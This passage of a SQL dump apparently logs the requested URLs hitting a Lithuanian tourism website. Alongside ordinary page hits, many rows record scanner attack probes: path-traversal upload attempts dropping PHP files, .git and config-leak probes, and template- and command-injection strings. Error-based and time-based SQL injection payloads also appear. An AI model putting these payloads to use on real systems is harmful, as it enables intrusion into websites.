00:00:00'),(5395,'https://www.infotytuvenai.lt/index.php/lt/media/system/js/caption.js','','','',6,0,'2022-05-13 12:01:01','0000-00-00 00:00:00'),(5396,'https://www.infotytuvenai.lt/index.php/lt/plugins/system/helix/js/jquery-noconflict.js','','','',6,0,'2022-05-13 12:01:03','0000-00-00 00:00:00'),(5397,'https://www.infotytuvenai.lt/index.php/lt/plugins/system/helix/js/bootstrap.min.js','','','',6,0,'2022-05-13 12:01:04','0000-00-00 00:00:00'),(5398,'https://www.infotytuvenai.lt/index.php/lt/plugins/system/helix/js/modernizr-2.6.2.min.js','','','',6,0,'2022-05-13 12:01:05','0000-00-00 00:00:00'),(5399,'https://www.infotytuvenai.lt/index.php/lt/plugins/system/helix/js/helix.core.js','','','',6,0,'2022-05-13 12:01:06','0000-00-00 00:00:00'),(5400,'https://www.infotytuvenai.lt/index.php/lt/plugins/system/helix/js/menu.js','','','',6,0,'2022-05-13 12:01:07','0000-00-00 00:00:00'),(5401,'https://infotytuvenai.lt/index.php/lt/turizmo-','','','',1,0,'2022-05-16 12:58:27','0000-00-00 00:00:00'),(5402,'https://infotytuvenai.lt/index.php/lt/44-paskutinesnaujienos/368-konkursas','','https://infotytuvenai.lt/','',10,0,'2022-05-17 10:56:45','0000-00-00 00:00:00'),(5403,'https://infotytuvenai.lt/index.php/lt/DTv36YPazfgBFe/DW6HOK8PSUk58/1nFzOgOCngCTJhdER/2UUCOkdHgvLsMyfNFVr','','','',1,0,'2022-05-21 06:01:54','0000-00-00 00:00:00'),(5404,'https://www.infotytuvenai.lt/index.php/lt/null','','','',2,0,'2022-05-21 19:21:36','0000-00-00 00:00:00'),(5405,'https://www.infotytuvenai.lt/index.php/lt/13-sample-data-article/demo/features/33-kava/favicon.ico','','www.wolframalpha.com','',2,0,'2022-05-26 01:36:23','0000-00-00 00:00:00'),(5406,'https://infotytuvenai.lt/index.php/lt/maitinimas/favicon.ico','','duckduckgo.com','',1,0,'2022-05-26 01:36:45','0000-00-00 00:00:00'),(5407,'https://www.infotytuvenai.lt/index.php/lt/maitinimas/maitinimo-meniu/favicon.ico','','yahoo.com','',2,0,'2022-05-26 01:36:57','0000-00-00 00:00:00'),(5408,'https://www.infotytuvenai.lt/index.php/lt/13-sample-data-article/demo/features/32-dviraciai/favicon.ico','','www.ask.com','',1,0,'2022-05-26 01:37:14','0000-00-00 00:00:00'),(5409,'https://www.infotytuvenai.lt/index.php/lt/tytuvenu-festivalis/naujienos/56-tytuvenu-festivalis/naujienos/','','','',2,0,'2022-05-28 02:09:19','0000-00-00 00:00:00'),(5410,'https://www.infotytuvenai.lt/index.php/lt/13-sample-data-article/demo/features/.git/HEAD','','http://infotytuvenai.lt/index.php/lt/13-sample-data-article/demo/features/.git/HEAD','',3,0,'2022-06-12 20:22:39','0000-00-00 00:00:00'),(5411,'https://www.infotytuvenai.lt/index.php/lt/13-sample-data-article/demo/.git/HEAD','','http://infotytuvenai.lt/index.php/lt/13-sample-data-article/demo/.git/HEAD','',3,0,'2022-06-12 20:23:19','0000-00-00 00:00:00'),(5412,'https://www.infotytuvenai.lt/index.php/lt/13-sample-data-article/.git/HEAD','','http://infotytuvenai.lt/index.php/lt/13-sample-data-article/.git/HEAD','',3,0,'2022-06-12 20:24:39','0000-00-00 00:00:00'),(5413,'https://www.infotytuvenai.lt/index.php/lt/component/content/article/.git/HEAD','','','',3,0,'2022-06-13 16:21:02','0000-00-00 00:00:00'),(5414,'https://www.infotytuvenai.lt/index.php/lt/component/.git/HEAD','','','',3,0,'2022-06-13 16:22:16','0000-00-00 00:00:00'),(5415,'https://www.infotytuvenai.lt/index.php/en/?option=com_user&view=register','','https://www.infotytuvenai.lt/index.php?option=com_user&view=register','',8,0,'2022-07-04 15:39:08','0000-00-00 00:00:00'),(5416,'https://www.infotytuvenai.lt/index.php/en/component/user?task=register','','https://www.infotytuvenai.lt/index.php/component/user/?task=register','',8,0,'2022-07-04 15:39:14','0000-00-00 00:00:00'),(5417,'https://www.infotytuvenai.lt/index.php/en/using-joomla/extensions/components/users-component/registration-form','','https://www.infotytuvenai.lt/index.php/using-joomla/extensions/components/users-component/registration-form','',8,0,'2022-07-04 15:39:43','0000-00-00 00:00:00'),(5418,'https://www.infotytuvenai.lt/index.php/lt/','','','',307,0,'2022-08-04 19:32:10','0000-00-00 00:00:00'),(5419,'https://infotytuvenai.lt/index.php/lt/tytuvenu-festivalis/kontaktai','','','',2,0,'2022-08-06 11:59:39','0000-00-00 00:00:00'),(5420,'https://www.infotytuvenai.lt/index.php/lt/favicon.ico','','','',100,0,'2022-08-21 13:46:06','0000-00-00 00:00:00'),(5421,'https://www.infotytuvenai.lt/index.php/en/favicon.ico','','','',1,0,'2022-08-24 09:16:22','0000-00-00 00:00:00'),(5422,'https://infotytuvenai.lt/index.php/lt/component/content/category/2-uncategorised','','','',2,0,'2022-09-01 01:33:38','0000-00-00 00:00:00'),(5423,'https://www.infotytuvenai.lt/index.php/en/component/content/category/','','','',3,0,'2022-09-04 19:34:09','0000-00-00 00:00:00'),(5424,'https://www.infotytuvenai.lt/index.php/lt/lankytini-objektai/fancybox/fancy_shadow_n.png','','https://www.infotytuvenai.lt/index.php/lt/lankytini-objektai/kulturos-paveldo-objektai','',1,0,'2022-09-10 15:11:21','0000-00-00 00:00:00'),(5425,'https://www.infotytuvenai.lt/index.php/lt/lankytini-objektai/fancybox/fancy_shadow_ne.png','','https://www.infotytuvenai.lt/index.php/lt/lankytini-objektai/kulturos-paveldo-objektai','',1,0,'2022-09-10 15:11:21','0000-00-00 00:00:00'),(5426,'https://www.infotytuvenai.lt/index.php/lt/lankytini-objektai/fancybox/fancy_shadow_e.png','','https://www.infotytuvenai.lt/index.php/lt/lankytini-objektai/kulturos-paveldo-objektai','',1,0,'2022-09-10 15:11:21','0000-00-00 00:00:00'),(5427,'https://www.infotytuvenai.lt/index.php/lt/lankytini-objektai/fancybox/fancy_shadow_se.png','','https://www.infotytuvenai.lt/index.php/lt/lankytini-objektai/kulturos-paveldo-objektai','',1,0,'2022-09-10 15:11:21','0000-00-00 00:00:00'),(5428,'https://www.infotytuvenai.lt/index.php/lt/lankytini-objektai/fancybox/fancy_shadow_s.png','','https://www.infotytuvenai.lt/index.php/lt/lankytini-objektai/kulturos-paveldo-objektai','',1,0,'2022-09-10 15:11:21','0000-00-00 00:00:00'),(5429,'https://www.infotytuvenai.lt/index.php/lt/lankytini-objektai/fancybox/fancy_shadow_sw.png','','https://www.infotytuvenai.lt/index.php/lt/lankytini-objektai/kulturos-paveldo-objektai','',1,0,'2022-09-10 15:11:21','0000-00-00 00:00:00'),(5430,'https://www.infotytuvenai.lt/index.php/lt/lankytini-objektai/fancybox/fancy_shadow_w.png','','https://www.infotytuvenai.lt/index.php/lt/lankytini-objektai/kulturos-paveldo-objektai','',1,0,'2022-09-10 15:11:22','0000-00-00 00:00:00'),(5431,'https://www.infotytuvenai.lt/index.php/lt/lankytini-objektai/fancybox/fancy_shadow_nw.png','','https://www.infotytuvenai.lt/index.php/lt/lankytini-objektai/kulturos-paveldo-objektai','',1,0,'2022-09-10 15:11:22','0000-00-00 00:00:00'),(5432,'https://www.infotytuvenai.lt/index.php/lt/?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&qqfile=/../../../bifveifhg.php','','','',1,0,'2022-09-16 01:20:50','0000-00-00 00:00:00'),(5433,'https://www.infotytuvenai.lt/index.php/lt/component/content/article/2-uncategorised/','','','',5,0,'2022-10-10 15:41:20','0000-00-00 00:00:00'),(5434,'https://www.infotytuvenai.lt/index.php/lt/wp-content/plugins/dzs-zoomsounds/savepng.php?location=1877.php','','','',1,0,'2022-10-17 13:49:02','0000-00-00 00:00:00'),(5435,'https://www.infotytuvenai.lt/index.php/lt//sitemap.xml','','','',1,0,'2022-10-21 18:34:29','0000-00-00 00:00:00'),(5436,'https://www.infotytuvenai.lt/index.php/lt//sitemap_index.xml','','','',1,0,'2022-10-21 18:34:29','0000-00-00 00:00:00'),(5437,'https://www.infotytuvenai.lt/index.php/lt//sitemap/index.xml','','','',1,0,'2022-10-21 18:34:29','0000-00-00 00:00:00'),(5438,'https://www.infotytuvenai.lt/index.php/lt//sitemap','','','',1,0,'2022-10-21 18:34:30','0000-00-00 00:00:00'),(5439,'https://www.infotytuvenai.lt/index.php/lt/?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&qqfile=/../../../Raiz0WorM_1666452841.php','','','',1,0,'2022-10-22 15:37:24','0000-00-00 00:00:00'),(5440,'https://www.infotytuvenai.lt/index.php/lt/?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&qqfile=/../../../Raiz0WorM_1666453063.php','','','',1,0,'2022-10-22 15:42:46','0000-00-00 00:00:00'),(5441,'https://www.infotytuvenai.lt/index.php/lt/?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&qqfile=/../../../Raiz0WorM_166646591.php','','','',1,0,'2022-10-22 19:15:23','0000-00-00 00:00:00'),(5442,'https://www.infotytuvenai.lt/index.php/lt/_ignition/execute-solution','','','',5,0,'2022-10-26 13:47:10','0000-00-00 00:00:00'),(5443,'https://www.infotytuvenai.lt/index.php/en/apie-centra/favicon.ico','','','',2,0,'2022-11-05 13:33:51','0000-00-00 00:00:00'),(5444,'https://www.infotytuvenai.lt/index.php/lt/maitinimas/favicon.ico','','','',2,0,'2022-11-05 13:36:55','0000-00-00 00:00:00'),(5445,'https://www.infotytuvenai.lt/index.php/lt/13-sample-data-article/demo/features/favicon.ico','','','',4,0,'2022-11-05 13:37:03','0000-00-00 00:00:00'),(5446,'https://www.infotytuvenai.lt/index.php/lt/turizmo-informacija/trasos','','','',3,0,'2022-11-11 05:41:00','0000-00-00 00:00:00'),(5447,'https://infotytuvenai.lt/index.php/lt/FAdttqgmKFAyWWEGl/K8pc1pi5yr1P5ngqez/Y3jX8r55IDvY740QpUow','','','',1,0,'2022-11-21 02:58:15','0000-00-00 00:00:00'),(5448,'https://www.infotytuvenai.lt/index.php/lt/images/1 page.jpg','','','',1,0,'2022-12-20 17:20:14','0000-00-00 00:00:00'),(5449,'https://www.infotytuvenai.lt/index.php/lt/?option=com_k2&view=itemlist&layout=category&task=category&id=9&Itemid=124&format=feed&type=rss','','','',2,0,'2022-12-29 18:16:01','0000-00-00 00:00:00'),(5450,'https://www.infotytuvenai.lt/index.php/lt/apie-centra/viesieji-pirkimai/mazos-vertes-pirkimai-2015-m','','','',4,0,'2022-12-30 08:31:17','0000-00-00 00:00:00'),(5451,'https://www.infotytuvenai.lt/index.php/lt/images/4 page.jpg','','','',1,0,'2023-01-04 06:03:16','0000-00-00 00:00:00'),(5452,'https://infotytuvenai.lt/index.php/lt/tytuvenu-festivalis/naujienos','','','',2,0,'2023-01-10 17:14:59','0000-00-00 00:00:00'),(5453,'https://www.infotytuvenai.lt/index.php/lt/apie-centra/ekskursijos/templates/tytuvenu_piligrimu_centras/js/fixed-menu.js','','http://www.infotytuvenai.lt','',2,0,'2023-01-24 18:32:46','0000-00-00 00:00:00'),(5454,'https://www.infotytuvenai.lt/index.php/lt/apie-centra/ekskursijos/media/system/js/mootools-core.js','','http://www.infotytuvenai.lt','',2,0,'2023-01-24 18:32:46','0000-00-00 00:00:00'),(5455,'https://www.infotytuvenai.lt/index.php/lt/apie-centra/ekskursijos/media/system/js/core.js','','http://www.infotytuvenai.lt','',2,0,'2023-01-24 18:32:48','0000-00-00 00:00:00'),(5456,'https://www.infotytuvenai.lt/index.php/lt/apie-centra/ekskursijos/media/k2/assets/js/jquery-1.8.3.min.js','','http://www.infotytuvenai.lt','',2,0,'2023-01-24 18:32:50','0000-00-00 00:00:00'),(5457,'https://www.infotytuvenai.lt/index.php/lt/apie-centra/ekskursijos/components/com_k2/js/k2.js?v2.6.7&sitepath=/','','http://www.infotytuvenai.lt','',2,0,'2023-01-24 18:32:52','0000-00-00 00:00:00'),(5458,'https://www.infotytuvenai.lt/index.php/lt/apie-centra/ekskursijos/media/system/js/caption.js','','http://www.infotytuvenai.lt','',2,0,'2023-01-24 18:32:55','0000-00-00 00:00:00'),(5459,'https://www.infotytuvenai.lt/index.php/lt/apie-centra/ekskursijos/plugins/system/helix/js/jquery-noconflict.js','','http://www.infotytuvenai.lt','',2,0,'2023-01-24 18:32:57','0000-00-00 00:00:00'),(5460,'https://www.infotytuvenai.lt/index.php/lt/apie-centra/ekskursijos/plugins/system/helix/js/bootstrap.min.js','','http://www.infotytuvenai.lt','',2,0,'2023-01-24 18:32:59','0000-00-00 00:00:00'),(5461,'https://www.infotytuvenai.lt/index.php/lt/apie-centra/ekskursijos/plugins/system/helix/js/modernizr-2.6.2.min.js','','http://www.infotytuvenai.lt','',2,0,'2023-01-24 18:33:01','0000-00-00 00:00:00'),(5462,'https://www.infotytuvenai.lt/index.php/lt/apie-centra/ekskursijos/plugins/system/helix/js/helix.core.js','','http://www.infotytuvenai.lt','',2,0,'2023-01-24 18:33:03','0000-00-00 00:00:00'),(5463,'https://www.infotytuvenai.lt/index.php/lt/apie-centra/ekskursijos/plugins/system/helix/js/menu.js','','http://www.infotytuvenai.lt','',2,0,'2023-01-24 18:33:05','0000-00-00 00:00:00'),(5464,'https://www.infotytuvenai.lt/index.php/en/turizmo-informacija/trasos','','','',2,0,'2023-01-29 11:14:39','0000-00-00 00:00:00'),(5465,'https://infotytuvenai.lt/index.php/lt/13-sample-data-article/demo/features/31-renginiai','','','',3,0,'2023-02-05 17:47:45','0000-00-00 00:00:00'),(5466,'https://www.infotytuvenai.lt/index.php/lt/xmlrpc.php','','','',2,0,'2023-02-09 10:14:10','0000-00-00 00:00:00'),(5467,'https://www.infotytuvenai.lt/index.php/lt/wordpress/xmlrpc.php','','','',2,0,'2023-02-09 10:14:10','0000-00-00 00:00:00'),(5468,'https://www.infotytuvenai.lt/index.php/lt/wp/xmlrpc.php','','','',2,0,'2023-02-09 10:14:11','0000-00-00 00:00:00'),(5469,'https://www.infotytuvenai.lt/index.php/lt/wp-admin','','','',1,0,'2023-02-09 10:14:14','0000-00-00 00:00:00'),(5470,'https://www.infotytuvenai.lt/index.php/lt/wp/wp-login.php','','','',1,0,'2023-02-09 10:14:16','0000-00-00 00:00:00'),(5471,'https://www.infotytuvenai.lt/index.php/lt/MSXML2.XMLHTTP','','https://www.infotytuvenai.lt/media/mj/2f13d8.js','',1,0,'2023-02-12 00:25:54','0000-00-00 00:00:00'),(5472,'https://www.infotytuvenai.lt/index.php/lt/Microsoft.XMLHTTP','','https://www.infotytuvenai.lt/media/mj/2f13d8.js','',1,0,'2023-02-12 00:25:56','0000-00-00 00:00:00'),(5473,'https://infotytuvenai.lt/index.php/lt/api/index.php/v1/config/application?public=true','','','',2,0,'2023-02-18 23:15:09','0000-00-00 00:00:00'),(5474,'https://www.infotytuvenai.lt/index.php/lt/api/index.php/v1/config/application?public=true','','','',3,0,'2023-02-19 00:56:53','0000-00-00 00:00:00'),(5475,'https://www.infotytuvenai.lt/index.php/en/.git/HEAD','','','',1,0,'2023-02-23 15:29:57','0000-00-00 00:00:00'),(5476,'https://infotytuvenai.lt/index.php/lt/api/v1/config/application?public=true','','','',1,0,'2023-02-27 19:13:25','0000-00-00 00:00:00'),(5477,'https://www.infotytuvenai.lt/index.php/lt/api/v1/config/application?public=true','','','',2,0,'2023-02-27 20:55:46','0000-00-00 00:00:00'),(5478,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content\nexpr+864368561+++941272699\n','','','',1,0,'2023-02-28 19:34:48','0000-00-00 00:00:00'),(5479,'https://www.infotytuvenai.lt/index.php/lt/?option=${@var_dump(md5(515564512))};','','','',1,0,'2023-02-28 19:34:49','0000-00-00 00:00:00'),(5480,'https://www.infotytuvenai.lt/index.php/lt/?option=${977786913+805006081}','','','',1,0,'2023-02-28 19:34:49','0000-00-00 00:00:00'),(5481,'https://www.infotytuvenai.lt/index.php/lt/?option=/*1*/{{951838085+836764633}}','','','',1,0,'2023-02-28 19:34:49','0000-00-00 00:00:00'),(5482,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content|expr+874901460+++889463237+','','','',1,0,'2023-02-28 19:34:49','0000-00-00 00:00:00'),(5483,'https://www.infotytuvenai.lt/index.php/lt/?option=\'-var_dump(md5(918994065))-\'','','','',1,0,'2023-02-28 19:34:50','0000-00-00 00:00:00'),(5484,'https://www.infotytuvenai.lt/index.php/lt/?option=${856925498+910734246}','','','',1,0,'2023-02-28 19:34:50','0000-00-00 00:00:00'),(5485,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content$(expr+877496302+++909366360)','','','',1,0,'2023-02-28 19:34:50','0000-00-00 00:00:00'),(5486,'https://www.infotytuvenai.lt/index.php/lt/?option=${(966821494+926169237)?c}','','','',1,0,'2023-02-28 19:34:50','0000-00-00 00:00:00'),(5487,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&set+/A+954850316+931322549','','','',1,0,'2023-02-28 19:34:51','0000-00-00 00:00:00'),(5488,'https://www.infotytuvenai.lt/index.php/lt/?option=expr+868461947+++834483719','','','',1,0,'2023-02-28 19:34:51','0000-00-00 00:00:00'),(5489,'https://www.infotytuvenai.lt/index.php/lt/?option=<%-+885404960+834785855+%>','','','',1,0,'2023-02-28 19:34:52','0000-00-00 00:00:00'),(5490,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content\'and/**/extractvalue(1,concat(char(126),md5(1146528977)))and\'','','','',1,0,'2023-02-28 19:34:52','0000-00-00 00:00:00'),(5491,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content\'and\'c\'=\'c','','','',1,0,'2023-02-28 19:34:52','0000-00-00 00:00:00'),(5492,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content\"and/**/extractvalue(1,concat(char(126),md5(1338900823)))and\"','','','',1,0,'2023-02-28 19:34:53','0000-00-00 00:00:00'),(5493,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content\'and\'e\'=\'w','','','',1,0,'2023-02-28 19:34:53','0000-00-00 00:00:00'),(5494,'https://www.infotytuvenai.lt/index.php/lt/?option=extractvalue(1,concat(char(126),md5(1156397429)))','','','',1,0,'2023-02-28 19:34:53','0000-00-00 00:00:00'),(5495,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content\'and(select\'1\'from/**/cast(md5(1357679939)as/**/int))>\'0','','','',1,0,'2023-02-28 19:34:54','0000-00-00 00:00:00'),(5496,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content/**/and/**/cast(md5(\'1420376272\')as/**/int)>0','','','',1,0,'2023-02-28 19:34:54','0000-00-00 00:00:00'),(5497,'https://www.infotytuvenai.lt/index.php/lt/?option=convert(int,sys.fn_sqlvarbasetostr(HashBytes(\'MD5\',\'1789084171\')))','','','',1,0,'2023-02-28 19:34:55','0000-00-00 00:00:00'),(5498,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content\'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes(\'MD5\',\'1088867460\')))>\'0','','','',1,0,'2023-02-28 19:34:55','0000-00-00 00:00:00'),(5499,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content\'and(select*from(select+sleep(0))a/**/union/**/select+1)=\'','','','',1,0,'2023-02-28 19:34:56','0000-00-00 00:00:00'),(5500,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content\'and(select*from(select+sleep(3))a/**/union/**/select+1)=\'','','','',1,0,'2023-02-28 19:34:56','0000-00-00 00:00:00'),(5501,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content\"and(select*from(select+sleep(0))a/**/union/**/select+1)=\"','','','',1,0,'2023-02-28 19:34:57','0000-00-00 00:00:00'),(5502,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content\"and(select*from(select+sleep(3))a/**/union/**/select+1)=\"','','','',1,0,'2023-02-28 19:34:58','0000-00-00 00:00:00'),(5503,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content\'/**/and(select\'1\'from/**/pg_sleep(0))::text>\'0','','','',1,0,'2023-02-28 19:35:00','0000-00-00 00:00:00'),(5504,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content\'/**/and(select\'1\'from/**/pg_sleep(3))::text>\'0','','','',1,0,'2023-02-28 19:35:01','0000-00-00 00:00:00'),(5505,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content\'and(select+1)>0waitfor/**/delay\'0:0:0','','','',1,0,'2023-02-28 19:35:04','0000-00-00 00:00:00'),(5506,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content\'and(select+1)>0waitfor/**/delay\'0:0:3','','','',1,0,'2023-02-28 19:35:05','0000-00-00 00:00:00'),(5507,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content\'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE(\'r\',0)=\'r','','','',1,0,'2023-02-28 19:35:06','0000-00-00 00:00:00'),(5508,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content\'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE(\'c\',3)=\'c','','','',1,0,'2023-02-28 19:35:07','0000-00-00 00:00:00'),(5509,'https://www.infotytuvenai.lt/index.php/lt/tytuvenu-festivalis/images/stories/muziejus/sarbievijaus_muziejus/edukacines_programos_kraziuose_placiau.pdf','','','',8,0,'2023-03-05 09:49:05','0000-00-00 00:00:00'),(5510,'https://www.infotytuvenai.lt/index.php/lt/tytuvenu-festivalis/images/stories/veiklos_ataskaitos/2015_metu_veiklos_ataskaita.pdf','','','',9,0,'2023-03-05 09:49:07','0000-00-00 00:00:00'),(5511,'https://www.infotytuvenai.lt/index.php/lt/tytuvenu-festivalis/images/stories/veiklos_ataskaitos/2015_m_balansas_ir_veiklos_rezultatai.pdf','','','',10,0,'2023-03-05 09:49:08','0000-00-00 00:00:00'),(5512,'https://www.infotytuvenai.lt/index.php/lt/tytuvenu-festivalis/images/stories/veiklos_ataskaitos/2016_metu_veiklos_ataskaita.pdf','','','',9,0,'2023-03-05 09:49:09','0000-00-00 00:00:00'),(5513,'https://www.infotytuvenai.lt/index.php/lt/tytuvenu-festivalis/images/stories/veiklos_ataskaitos/veiklos_ataskaita_2019.pdf','','','',8,0,'2023-03-05 09:49:10','0000-00-00 00:00:00'),(5514,'https://www.infotytuvenai.lt/index.php/lt/tytuvenu-festivalis/images/stories/veiklos_ataskaitos/2020_m_veiklos_ataskaita.pdf','','','',7,0,'2023-03-05 09:49:11','0000-00-00 00:00:00'),(5515,'https://www.infotytuvenai.lt/index.php/lt/tytuvenu-festivalis/images/stories/veiklos_ataskaitos/balansas_ir_veiklos_rezultatu_ataskaita_2016m.pdf','','','',8,0,'2023-03-05 09:49:11','0000-00-00 00:00:00'),(5516,'https://www.infotytuvenai.lt/index.php/lt/tytuvenu-festivalis/images/stories/veiklos_ataskaitos/2014m_veiklos_ataskaita.pdf','','','',8,0,'2023-03-05 09:49:12','0000-00-00 00:00:00'),(5517,'https://www.infotytuvenai.lt/index.php/lt/tytuvenu-festivalis/images/stories/veiklos_ataskaitos/2021_m_veiklos_ataskaita.pdf','','','',8,0,'2023-03-05 09:49:13','0000-00-00 00:00:00'),(5518,'https://www.infotytuvenai.lt/index.php/lt/tytuvenu-festivalis/images/stories/veiklos_ataskaitos/2013m_veiklos_ataskaita.pdf','','','',7,0,'2023-03-05 09:49:15','0000-00-00 00:00:00'),(5519,'https://www.infotytuvenai.lt/index.php/lt/images/stories/veiklos_ataskaitos/balansas_ir_veiklos_rezultatu_ataskaita_2016m.pdf','','','',9,0,'2023-03-14 06:20:35','0000-00-00 00:00:00'),(5520,'https://www.infotytuvenai.lt/index.php/lt/images/stories/veiklos_ataskaitos/2021_m_veiklos_ataskaita.pdf','','','',5,0,'2023-03-14 06:20:37','0000-00-00 00:00:00'),(5521,'https://www.infotytuvenai.lt/index.php/lt/images/stories/muziejus/sarbievijaus_muziejus/edukacines_programos_kraziuose_placiau.pdf','','','',9,0,'2023-03-14 06:20:38','0000-00-00 00:00:00'),(5522,'https://www.infotytuvenai.lt/index.php/lt/images/stories/veiklos_ataskaitos/2014m_veiklos_ataskaita.pdf','','','',7,0,'2023-03-14 06:20:38','0000-00-00 00:00:00'),(5523,'https://www.infotytuvenai.lt/index.php/lt/images/stories/veiklos_ataskaitos/2015_metu_veiklos_ataskaita.pdf','','','',10,0,'2023-03-14 06:20:39','0000-00-00 00:00:00'),(5524,'https://www.infotytuvenai.lt/index.php/lt/images/stories/veiklos_ataskaitos/2016_metu_veiklos_ataskaita.pdf','','','',6,0,'2023-03-14 06:20:40','0000-00-00 00:00:00'),(5525,'https://www.infotytuvenai.lt/index.php/lt/images/stories/veiklos_ataskaitos/veiklos_ataskaita_2019.pdf','','','',6,0,'2023-03-14 06:20:40','0000-00-00 00:00:00'),(5526,'https://www.infotytuvenai.lt/index.php/lt/images/stories/veiklos_ataskaitos/2013m_veiklos_ataskaita.pdf','','','',9,0,'2023-03-14 06:20:41','0000-00-00 00:00:00'),(5527,'https://www.infotytuvenai.lt/index.php/lt/images/stories/veiklos_ataskaitos/2015_m_balansas_ir_veiklos_rezultatai.pdf','','','',10,0,'2023-03-14 06:20:42','0000-00-00 00:00:00'),(5528,'https://www.infotytuvenai.lt/index.php/lt/images/stories/skaidres.pdf','','','',12,0,'2023-03-14 06:20:42','0000-00-00 00:00:00'),(5529,'https://www.infotytuvenai.lt/index.php/lt/images/stories/veiklos_ataskaitos/2020_m_veiklos_ataskaita.pdf','','','',8,0,'2023-03-14 06:20:43','0000-00-00 00:00:00'),(5530,'https://www.infotytuvenai.lt/index.php/lt/turizmo-informacija/kulinarinis-paveldas','','https://www.infotytuvenai.lt/index.php/lt/kontaktai','',115,0,'2023-04-08 19:44:43','0000-00-00 00:00:00'),(5531,'https://infotytuvenai.lt/index.php/lt/44-paskutinesnaujienos/338-naujas-darbo-laikas','','','',1,0,'2023-04-09 03:34:48','0000-00-00 00:00:00'),(5532,'https://www.infotytuvenai.lt/index.php/en/turizmo-informacija/kulinarinis-paveldas','','https://www.google.com/','',53,0,'2023-04-09 22:26:22','0000-00-00 00:00:00'),(5533,'https://www.infotytuvenai.lt/index.php/lt/vendor/htmlawed/htmlawed/htmLawedTest.php','','','',1,0,'2023-04-19 23:18:36','0000-00-00 00:00:00'),(5534,'https://infotytuvenai.lt/index.php/lt/turizmo-informacija/kulinarinis-paveldas','','','',14,0,'2023-04-26 15:13:39','0000-00-00 00:00:00'),(5535,'https://www.infotytuvenai.lt/index.php/lt/blog/wp-json/wp/v2/users','','','',1,0,'2023-05-15 00:52:45','0000-00-00 00:00:00'),(5536,'https://www.infotytuvenai.lt/index.php/lt//favicon.ico','','','',3,0,'2023-05-28 18:39:14','0000-00-00 00:00:00'),(5537,'https://www.infotytuvenai.lt/index.php/lt/pasiulymai;','','','',2,0,'2023-06-07 08:26:59','0000-00-00 00:00:00'),(5538,'https://www.infotytuvenai.lt/index.php/lt/?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&qqfile=/../../../Raiz0WorM_1687250647.php','','','',1,0,'2023-06-20 08:47:09','0000-00-00 00:00:00'),(5539,'https://www.infotytuvenai.lt/index.php/en/images/presets/preset3/logo.png','','https://www.infotytuvenai.lt/index.php/en/44-paskutinesnaujienos/325-kvieciame-visus-i-vakariene-baltas-vakaras-4','',1,0,'2023-06-30 15:31:29','0000-00-00 00:00:00'),(5540,'https://www.infotytuvenai.lt/index.php/lt/images/3 page.jpg','','','',1,0,'2023-07-14 19:04:04','0000-00-00 00:00:00'),(5541,'https://infotytuvenai.lt/index.php/en/turizmo-informacija/kulinarinis-paveldas','','','',1,0,'2023-07-17 00:26:54','0000-00-00 00:00:00'),(5542,'https://www.infotytuvenai.lt/index.php/lt/?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&qqfile=/../../../Raiz0WorM_1689602119.php','','','',1,0,'2023-07-17 14:06:35','0000-00-00 00:00:00'),(5543,'https://www.infotytuvenai.lt/index.php/lt/tytuvenu-festivalis/images/6 page.jpg','','','',1,0,'2023-07-18 02:00:49','0000-00-00 00:00:00'),(5544,'https://www.infotytuvenai.lt/index.php/lt/?option=5314&view=article&id=305','','','',1,0,'2023-07-21 16:05:00','0000-00-00 00:00:00'),(5545,'https://www.infotytuvenai.lt/index.php/lt/?option=1356&view=article&id=305','','','',1,0,'2023-07-21 16:05:01','0000-00-00 00:00:00'),(5546,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content)(,\')\",.,.&view=article&id=305','','','',1,0,'2023-07-21 16:05:02','0000-00-00 00:00:00'),(5547,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content\'IvwOnf<\'\">DEDLdJ&view=article&id=305','','','',1,0,'2023-07-21 16:05:03','0000-00-00 00:00:00'),(5548,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content) AND 9645=3420 AND (5149=5149&view=article&id=305','','','',1,0,'2023-07-21 16:05:16','0000-00-00 00:00:00'),(5549,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content) AND 7731=7731 AND (4679=4679&view=article&id=305','','','',1,0,'2023-07-21 16:05:17','0000-00-00 00:00:00'),(5550,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content AND 1624=8017&view=article&id=305','','','',1,0,'2023-07-21 16:05:18','0000-00-00 00:00:00'),(5551,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content AND 7731=7731&view=article&id=305','','','',1,0,'2023-07-21 16:05:19','0000-00-00 00:00:00'),(5552,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content\') AND 4472=3140 AND (\'lmUl\'=\'lmUl&view=article&id=305','','','',1,0,'2023-07-21 16:05:20','0000-00-00 00:00:00'),(5553,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content\') AND 7731=7731 AND 